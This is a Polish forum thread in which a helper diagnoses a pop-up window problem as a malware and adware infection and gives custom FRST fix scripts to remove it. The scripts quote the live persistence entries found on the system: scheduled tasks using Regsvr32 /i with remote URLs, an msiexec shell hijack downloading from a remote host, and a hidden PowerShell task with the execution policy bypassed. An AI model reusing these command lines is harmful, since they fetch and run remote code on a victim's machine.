Skocz do zawartości

Co kilkanaście minut wyskakujące okienko (może konsola CMD)


Rekomendowane odpowiedzi

Witam, jestem tu już po raz drugi i raz jeszcze dziękuję za poprzednią pomoc.

 

Przemaglowałem na lewo i prawo podobny temat na niniejszym forum ale wnioskuję, że jest to problem generowany przez konkretną aplikację więc mam nadzieję, że któryś z czarodziejów mi pomoże :)

 

 
Problem: Co kilkanaście/kilkadziesiąt minut otwiera mi się na ułamek sekundy "jakieś" okienko na mniej więcej 3/4 ekranu i momentalnie znika - nie mam pojęcia co to jest ale wkurza niemiłosiernie. Najgorzej jest w momencie korzystania z aplikacji pełnoekranowych - pojawiające się okienko momentalnie wyrzuca do pulpitu ale nie zamyka działających aplikacji.

 
Co robiłem: Windowsa 10 mam od dłuższego czasu i dotychczas nic podobnego nie występowało. Nie instaluję niczego podejrzanego chociaż po występującym problemie wnioskuję, że jednak tak.

Oczywiście skanowałem komputer antywirusem, przeanalizowałem wszystkie zainstalowane programy i nie potrafię stwierdzić co może być przyczyną.

 

Uprzejmie proszę o pomoc i z góry dzięki za poświęcony czas.

 

Wrzucam logi z FRST.

 

Addition.txt

FRST.txt

Shortcut.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

Temat przenoszę do działu malware - w systemie grasuje infekcja (ostatnio ładowana przez wynalazki typu KMSpico), poza tym inne ślady modyfikacji adware (np. fałszywe przeglądarki).

 

 

Operacje do przeprowadzenia:

 

1. Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj lewy program YAC(Yet Another Cleaner!) oraz fałszywy WorldOfTanks. Nie pomyl programów, tylko pierwsze wejście jest poprawne od gry:

 

World of Tanks (HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net)

WorldofTanks (HKLM-x32\...\WorldofTanks) (Version: - )

 

2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

CloseProcesses:
CreateRestorePoint:
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116376 2017-05-24] () 
R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [brak podpisu cyfrowego]
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) 
S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [X]
S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) 
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) 
S1 iSafeKrnl; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [X] 
S1 iSafeKrnlKit; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [X] 
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] 
S1 iSafeKrnlR3; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [X] 
Task: {0D7F4DB9-573C-4080-AF4A-79B3D6AAB75D} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== scrobj.dll
Task: {10A81261-90F5-46B2-9684-6D8778E04859} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== scrobj.dll
Task: {D48645EB-CC21-43F7-8FDE-9A023E2D224A} - System32\Tasks\Windows_Antimalware_System_Host => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [2017-06-12] (® Microsoft Corporation. All rights reserved.)
Task: {E39F1B69-B55E-4D0E-954C-D79A1A0D5386} - System32\Tasks\Windows_Antimalware_Host => powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file C:\ProgramData\u3bO8YL0WR.ps1
Task: C:\Windows\Tasks\One System Care Task.job => C:\PROGRA~2\ONESYS~1\SystemConsole.exe 
Task: C:\Windows\Tasks\One System CarePeriod.job => 
HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Run: [Local Security Authority Process] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) 
HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Run: [Local Security Authority Processor] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) 
HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== /q 
HKLM-x32\...\Run: [] => [X]
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) 
HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) 
HKLM\...\StartupApproved\Run32: => "Start_BusinessEverywhere_{ad30a369-08e3-414c-9d2c-7f47dbe748da}"
HKLM\...\StartupApproved\Run32: => "Start_SMSNotifier_{ad30a369-08e3-414c-9d2c-7f47dbe748da}"
HKLM\...\StartupApproved\Run32: => "Start_Update_{ad30a369-08e3-414c-9d2c-7f47dbe748da}"
HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartupApproved\Run: => "World of Tanks"
HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
DeleteKey: HKCU\Software\Bagsarah
DeleteKey: HKCU\Software\Firefox
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Bagsarah
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Program Files\KMSpico
C:\Program Files (x86)\Bagsarah
C:\Program Files (x86)\BiaoJi
C:\Program Files (x86)\Elex-tech
C:\Program Files (x86)\Firefox
C:\Program Files (x86)\ProxyGate
C:\ProgramData\u3bO8YL0WR.ps1
C:\ProgramData\5f5e51cb-5c01-0
C:\ProgramData\5f5e51cb-4bd3-1
C:\ProgramData\MicrosoftCorporation
C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinDirStat
C:\Users\Barteczek\AppData\Local\Bagsarah
C:\Users\Barteczek\AppData\Local\Firefox
C:\Users\Barteczek\AppData\Local\minergate-cli
C:\Users\Barteczek\AppData\Local\Mozilla
C:\Users\Barteczek\AppData\LocalLow\Mozilla
C:\Users\Barteczek\AppData\Roaming\BrowserModule
C:\Users\Barteczek\AppData\Roaming\Firefox
C:\Users\Barteczek\AppData\Roaming\Mozilla
C:\Users\Barteczek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Isass.lnk
C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WorldofTanks
C:\Users\Barteczek\Downloads\torrentex0.1.4b.exe
C:\Users\Public\Documents\chrome
C:\Users\Public\Documents\report.dat
C:\Users\Public\Documents\temp.dat
C:\Windows\SysWOW64\00
C:\Windows\SysWOW64\11
C:\Windows\SysWOW64\1111
C:\Windows\SysWOW64\1111111
C:\Windows\SysWOW64\33
C:\Windows\SysWOW64\3333333
C:\Windows\SysWOW64\55
C:\Windows\SysWOW64\GZ
CMD: netsh advfirewall reset
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Zostały usunięte wszystkie skróty fałszywych przeglądarek. Odtwórz w wybranych miejscach skróty do prawdziwego Google Chrome. Uruchom przeglądarkę i wyczyść ją z adware:

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj adware Tables.
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Wyszukiwarka > z rozwijanego menu ustaw jako domyślną Google > klik w Zarządzaj wyszukiwarkami i skasuj z listy wszystkie inne pozycje.
  • Ustaw też przeglądarkę jako domyślną
4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.
Odnośnik do komentarza

1. Nadal widzę przekierowania luckysearch123.com w Google Chrome.

  • Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń adres luckysearch123.com, przestaw na "Otwórz stronę nowej karty"
  • Ustawienia > karta Ustawienia > Wygląd i kliknij w napis "Pokaż przycisk strony startowej" > przełącz na opcję "Niestandardową" i usuń adres luckysearch123.com, następnie przełącz z powrotem na "Nową kartę".
  • I czy na pewno ta wyszukiwarka nie figuruje na liście wyboru szukajek?
2. Uruchom FRST, w polu Szukaj (Search) wklej co poniżej i klik w Szukaj w rejestrze (Search Registry). Przedstaw wynikowy SearchReg.txt.

 

Bagsarah;Firefox

 

3. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

Odnośnik do komentarza

Wyniki z obu narzędzi zostaną usunięte hurtem przy udziale jednego skryptu FRST.

 

Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\iSafeKrnlBoot
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Elex-tech
DeleteKey: HKLM\SOFTWARE\WOW6432Node\ScreenShot
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Mozilla
DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I
DeleteKey: HKCU\Software\csastats
DeleteKey: HKCU\Software\dobreprogramy
DeleteKey: HKCU\Software\ICSW1.23
DeleteKey: HKCU\Software\One System Care
DeleteKey: HKCU\Software\PRODUCTSETUP
DeleteKey: HKCU\SOFTWARE\Classes\https
DeleteKey: HKCU\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ac1f1114_0
DeleteKey: HKCU\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\b1b34855_0
DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{BDC6D552-7F73-4130-B342-1DB676DE23E0}
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Bagsarah\Application\chrome.exe
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
RemoveDirectory: C:\AdwCleaner
RemoveDirectory: C:\FRST\Quarantine
RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\Bagsarah
RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\Elex-tech
RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\SSMgre
RemoveDirectory: C:\Windows\system32\log
StartBatch:
del /q C:\Windows\system32\drivers\iSafeKrnlBoot.sys
del /q C:\Windows\system32\drivers\iSafeNetFilter.sys
EndBatch:

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.

 

I proszę potwierdź, że w Chrome na liście wyszukiwarek adware już nie figuruje.

Odnośnik do komentarza
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...